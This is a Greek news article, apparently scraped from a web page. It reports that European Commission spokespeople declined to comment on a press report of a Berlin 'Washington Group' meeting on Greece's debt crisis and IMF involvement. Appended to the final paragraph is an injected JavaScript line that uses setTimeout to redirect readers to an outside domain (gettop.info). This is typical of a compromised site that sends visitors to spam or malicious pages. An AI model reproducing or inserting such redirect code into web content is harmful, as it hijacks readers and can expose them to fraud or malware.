«Δεν σχολιάζουμε» απαντά η Κομισιόν για το «μίνι Eurogroup» του Βερολίνου

0
2

 

«Δεν σχολιάζουμε διαρροές προς τον Τύπο», απάντησε η εκπρόσωπος της Ευρωπαϊκής Επιτροπής, αρμόδια για τις Οικονομικές Υποθέσεις, Ανίκα Μπράιτχαρντ, όταν της ζητήθηκε να σχολιάσει το δημοσίευμα της γερμανικής εφημερίδας Süddeutsche Zeitung, το οποίο ανέφερε ότι την Παρασκευή επρόκειτο να συγκληθεί στο Βερολίνο το λεγόμενο Washington Group, (δηλαδή, οι υπουργοί Οικονομικών Γερμανίας, Γαλλίας, Ολλανδίας, Ισπανίας και Ιταλίας, καθώς και εκπρόσωποι της Επιτροπής, της ΕΚΤ και τουΔΝΤ) με θέμα την κρίση χρέους της Ελλάδας και τη συμμετοχή του Ταμείου στο ελληνικό πρόγραμμα.

Η ίδια τόνισε πως δεν είναι στις αρμοδιότητες του επιτρόπου Οικονομικών «να επιβεβαιώνει ή να διαψεύδει τέτοιες συναντήσεις».

Επιπλέον, ο εκπρόσωπος της Κομισιόν, Μαργαρίτης Σχοινάς, ερωτηθείς εάν ο επίτροπος Οικονομικών, Πιέρ Μοσκοβισί, είχε προγραμματίσει ταξίδι στο Βερολίνο, απάντησε ότι «δεν σχολιάζουμε διαρροές, ούτε υποθετικές ερωτήσεις που σχετίζονται με αυτές τις διαρροές». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here